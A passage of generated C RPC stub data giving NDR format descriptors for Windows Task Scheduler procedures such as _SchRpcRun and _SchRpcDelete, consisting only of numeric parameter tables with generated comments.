0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 474 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 476 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 478 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_4 */ - -/* 480 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 482 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 484 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_5 */ - -/* 486 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 488 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 490 */ NdrFcShort( 0x64 ), /* Type Offset=100 */ - - /* Parameter arg_6 */ - -/* 492 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 494 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ -/* 496 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcEnumInstances */ - - - /* Return value */ - -/* 498 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 500 */ NdrFcLong( 0x0 ), /* 0 */ -/* 504 */ NdrFcShort( 0x8 ), /* 8 */ -/* 506 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 508 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 510 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 512 */ NdrFcShort( 0x8 ), /* 8 */ -/* 514 */ NdrFcShort( 0x24 ), /* 36 */ -/* 516 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ - 0x5, /* 5 */ -/* 518 */ 0xa, /* 10 */ - 0x3, /* Ext Flags: new corr desc, clt corr check, */ -/* 520 */ NdrFcShort( 0x1 ), /* 1 */ -/* 522 */ NdrFcShort( 0x0 ), /* 0 */ -/* 524 */ NdrFcShort( 0x0 ), /* 0 */ -/* 526 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 528 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ -/* 530 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 532 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ - - /* Parameter arg_1 */ - -/* 534 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 536 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 538 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 540 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 542 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 544 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 546 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 548 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 550 */ NdrFcShort( 0x82 ), /* Type Offset=130 */ - - /* Parameter arg_4 */ - -/* 552 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 554 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 556 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcGetInstanceInfo */ - - - /* Return value */ - -/* 558 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 560 */ NdrFcLong( 0x0 ), /* 0 */ -/* 564 */ NdrFcShort( 0x9 ), /* 9 */ -/* 566 */ NdrFcShort( 0x50 ), /* X64 Stack size/offset = 80 */ -/* 568 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 570 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 572 */ NdrFcShort( 0x44 ), /* 68 */ -/* 574 */ NdrFcShort( 0x5c ), /* 92 */ -/* 576 */ 0x45, /* Oi2 Flags: srv must size, has return, has ext, */ - 0x9, /* 9 */ -/* 578 */ 0xa, /* 10 */ - 0x3, /* Ext Flags: new corr desc, clt corr check, */ -/* 580 */ NdrFcShort( 0x1 ), /* 1 */ -/* 582 */ NdrFcShort( 0x0 ), /* 0 */ -/* 584 */ NdrFcShort( 0x0 ), /* 0 */ -/* 586 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 588 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ -/* 590 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 592 */ NdrFcShort( 0x90 ), /* Type Offset=144 */ - - /* Parameter arg_1 */ - -/* 594 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 596 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 598 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ - - /* Parameter arg_2 */ - -/* 600 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 602 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 604 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 606 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 608 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 610 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ - - /* Parameter arg_4 */ - -/* 612 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 614 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 616 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ - - /* Parameter arg_5 */ - -/* 618 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 620 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 622 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_6 */ - -/* 624 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 626 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ -/* 628 */ NdrFcShort( 0xb6 ), /* Type Offset=182 */ - - /* Parameter arg_7 */ - -/* 630 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 632 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ -/* 634 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_8 */ - -/* 636 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 638 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ -/* 640 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcStopInstance */ - - - /* Return value */ - -/* 642 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 644 */ NdrFcLong( 0x0 ), /* 0 */ -/* 648 */ NdrFcShort( 0xa ), /* 10 */ -/* 650 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 652 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 654 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 656 */ NdrFcShort( 0x4c ), /* 76 */ -/* 658 */ NdrFcShort( 0x8 ), /* 8 */ -/* 660 */ 0x44, /* Oi2 Flags: has return, has ext, */ - 0x3, /* 3 */ -/* 662 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 664 */ NdrFcShort( 0x0 ), /* 0 */ -/* 666 */ NdrFcShort( 0x0 ), /* 0 */ -/* 668 */ NdrFcShort( 0x0 ), /* 0 */ -/* 670 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 672 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ -/* 674 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 676 */ NdrFcShort( 0x90 ), /* Type Offset=144 */ - - /* Parameter arg_1 */ - -/* 678 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 680 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 682 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 684 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 686 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 688 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcStop */ - - - /* Return value */ - -/* 690 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 692 */ NdrFcLong( 0x0 ), /* 0 */ -/* 696 */ NdrFcShort( 0xb ), /* 11 */ -/* 698 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 700 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 702 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 704 */ NdrFcShort( 0x8 ), /* 8 */ -/* 706 */ NdrFcShort( 0x8 ), /* 8 */ -/* 708 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x3, /* 3 */ -/* 710 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 712 */ NdrFcShort( 0x0 ), /* 0 */ -/* 714 */ NdrFcShort( 0x0 ), /* 0 */ -/* 716 */ NdrFcShort( 0x0 ), /* 0 */ -/* 718 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 720 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ -/* 722 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 724 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ - - /* Parameter arg_1 */ - -/* 726 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 728 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 730 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 732 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 734 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 736 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcRun */ - - - /* Return value */ - -/* 738 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 740 */ NdrFcLong( 0x0 ), /* 0 */ -/* 744 */ NdrFcShort( 0xc ), /* 12 */ -/* 746 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ -/* 748 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 750 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 752 */ NdrFcShort( 0x18 ), /* 24 */ -/* 754 */ NdrFcShort( 0x4c ), /* 76 */ -/* 756 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x8, /* 8 */ -/* 758 */ 0xa, /* 10 */ - 0x5, /* Ext Flags: new corr desc, srv corr check, */ -/* 760 */ NdrFcShort( 0x0 ), /* 0 */ -/* 762 */ NdrFcShort( 0x1 ), /* 1 */ -/* 764 */ NdrFcShort( 0x0 ), /* 0 */ -/* 766 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 768 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 770 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 772 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 774 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 776 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 778 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 780 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ -/* 782 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 784 */ NdrFcShort( 0xd4 ), /* Type Offset=212 */ - - /* Parameter arg_3 */ - -/* 786 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 788 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 790 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_4 */ - -/* 792 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 794 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 796 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_5 */ - -/* 798 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ -/* 800 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 802 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ - - /* Parameter arg_6 */ - -/* 804 */ NdrFcShort( 0x4112 ), /* Flags: must free, out, simple ref, srv alloc size=16 */ -/* 806 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ -/* 808 */ NdrFcShort( 0x90 ), /* Type Offset=144 */ - - /* Parameter arg_7 */ - -/* 810 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 812 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ -/* 814 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcDelete */ - - - /* Return value */ - -/* 816 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 818 */ NdrFcLong( 0x0 ), /* 0 */ -/* 822 */ NdrFcShort( 0xd ), /* 13 */ -/* 824 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 826 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 828 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 830 */ NdrFcShort( 0x8 ), /* 8 */ -/* 832 */ NdrFcShort( 0x8 ), /* 8 */ -/* 834 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x3, /* 3 */ -/* 836 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 838 */ NdrFcShort( 0x0 ), /* 0 */ -/* 840 */ NdrFcShort( 0x0 ), /* 0 */ -/* 842 */ NdrFcShort( 0x0 ), /* 0 */ -/* 844 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 846 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 848 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 850 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 852 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 854 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 856 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 858 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 860 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 862 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcRename */ - - - /* Return value */ - -/* 864 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 866 */ NdrFcLong( 0x0 ), /* 0 */ -/* 870 */ NdrFcShort( 0xe ), /* 14 */ -/* 872 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 874 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 876 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 878 */ NdrFcShort( 0x8 ), /* 8 */ -/* 880 */ NdrFcShort( 0x8 ), /* 8 */ -/* 882 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x4, /* 4 */ -/* 884 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 886 */ NdrFcShort( 0x0 ), /* 0 */ -/* 888 */ NdrFcShort( 0x0 ), /* 0 */ -/* 890 */ NdrFcShort( 0x0 ), /* 0 */ -/* 892 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 894 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 896 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 898 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 900 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 902 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 904 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_2 */ - -/* 906 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 908 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 910 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 912 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 914 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 916 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcScheduledRuntimes */ - - - /* Return value */ - -/* 918 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 920 */ NdrFcLong( 0x0 ), /* 0 */ -/* 924 */ NdrFcShort( 0xf ), /* 15 */ -/* 926 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ -/* 928 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 930 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 932 */ NdrFcShort( 0x78 ), /* 120 */ -/* 934 */ NdrFcShort( 0x24 ), /* 36 */ -/* 936 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ - 0x8, /* 8 */ -/* 938 */ 0xa, /* 10 */ - 0x3, /* Ext Flags: new corr desc, clt corr check, */ -/* 940 */ NdrFcShort( 0x1 ), /* 1 */ -/* 942 */ NdrFcShort( 0x0 ), /* 0 */ -/* 944 */ NdrFcShort( 0x0 ), /* 0 */ -/* 946 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 948 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 950 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 952 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 954 */ NdrFcShort( 0xa ), /* Flags: must free, in, */ -/* 956 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 958 */ NdrFcShort( 0xf2 ), /* Type Offset=242 */ - - /* Parameter arg_2 */ - -/* 960 */ NdrFcShort( 0xa ), /* Flags: must free, in, */ -/* 962 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 964 */ NdrFcShort( 0xf2 ), /* Type Offset=242 */ - - /* Parameter arg_3 */ - -/* 966 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 968 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 970 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_4 */ - -/* 972 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 974 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 976 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_5 */ - -/* 978 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 980 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 982 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_6 */ - -/* 984 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 986 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ -/* 988 */ NdrFcShort( 0x104 ), /* Type Offset=260 */ - - /* Parameter arg_7 */ - -/* 990 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 992 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ -/* 994 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcGetLastRunInfo */ - - - /* Return value */ - -/* 996 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 998 */ NdrFcLong( 0x0 ), /* 0 */ -/* 1002 */ NdrFcShort( 0x10 ), /* 16 */ -/* 1004 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 1006 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 1008 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 1010 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1012 */ NdrFcShort( 0x58 ), /* 88 */ -/* 1014 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x4, /* 4 */ -/* 1016 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 1018 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1020 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1022 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1024 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 1026 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 1028 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 1030 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 1032 */ NdrFcShort( 0x4112 ), /* Flags: must free, out, simple ref, srv alloc size=16 */ -/* 1034 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 1036 */ NdrFcShort( 0xf6 ), /* Type Offset=246 */ - - /* Parameter arg_2 */ - -/* 1038 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 1040 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 1042 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 1044 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 1046 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 1048 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcGetTaskInfo */ - - - /* Return value */ - -/* 1050 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 1052 */ NdrFcLong( 0x0 ), /* 0 */ -/* 1056 */ NdrFcShort( 0x11 ), /* 17 */ -/* 1058 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 1060 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 1062 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 1064 */ NdrFcShort( 0x8 ), /* 8 */ -/* 1066 */ NdrFcShort( 0x40 ), /* 64 */ -/* 1068 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x5, /* 5 */ -/* 1070 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 1072 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1074 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1076 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1078 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 1080 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 1082 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 1084 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 1086 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 1088 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 1090 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 1092 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 1094 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 1096 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 1098 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 1100 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 1102 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_4 */ - -/* 1104 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 1106 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 1108 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcGetNumberOfMissedRuns */ - - - /* Return value */ - -/* 1110 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 1112 */ NdrFcLong( 0x0 ), /* 0 */ -/* 1116 */ NdrFcShort( 0x12 ), /* 18 */ -/* 1118 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 1120 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 1122 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 1124 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1126 */ NdrFcShort( 0x24 ), /* 36 */ -/* 1128 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x3, /* 3 */ -/* 1130 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 1132 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1134 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1136 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1138 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 1140 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 1142 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 1144 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 1146 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 1148 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 1150 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 1152 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 1154 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 1156 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcEnableTask */ - - - /* Return value */ - -/* 1158 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 1160 */ NdrFcLong( 0x0 ), /* 0 */ -/* 1164 */ NdrFcShort( 0x13 ), /* 19 */ -/* 1166 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 1168 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 1170 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 1172 */ NdrFcShort( 0x8 ), /* 8 */ -/* 1174 */ NdrFcShort( 0x8 ), /* 8 */ -/* 1176 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x3, /* 3 */ -/* 1178 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 1180 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1182 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1184 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1186 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 1188 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 1190 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 1192 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 1194 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 1196 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 1198 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 1200 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 1202 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 1204 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - 0x0 - } - }; - -static const rpc_MIDL_TYPE_FORMAT_STRING rpc__MIDL_TypeFormatString = - { - 0, - { - NdrFcShort( 0x0 ), /* 0 */ -/* 2 */ - 0x11, 0xc, /* FC_RP [alloced_on_stack] [simple_pointer] */ -/* 4 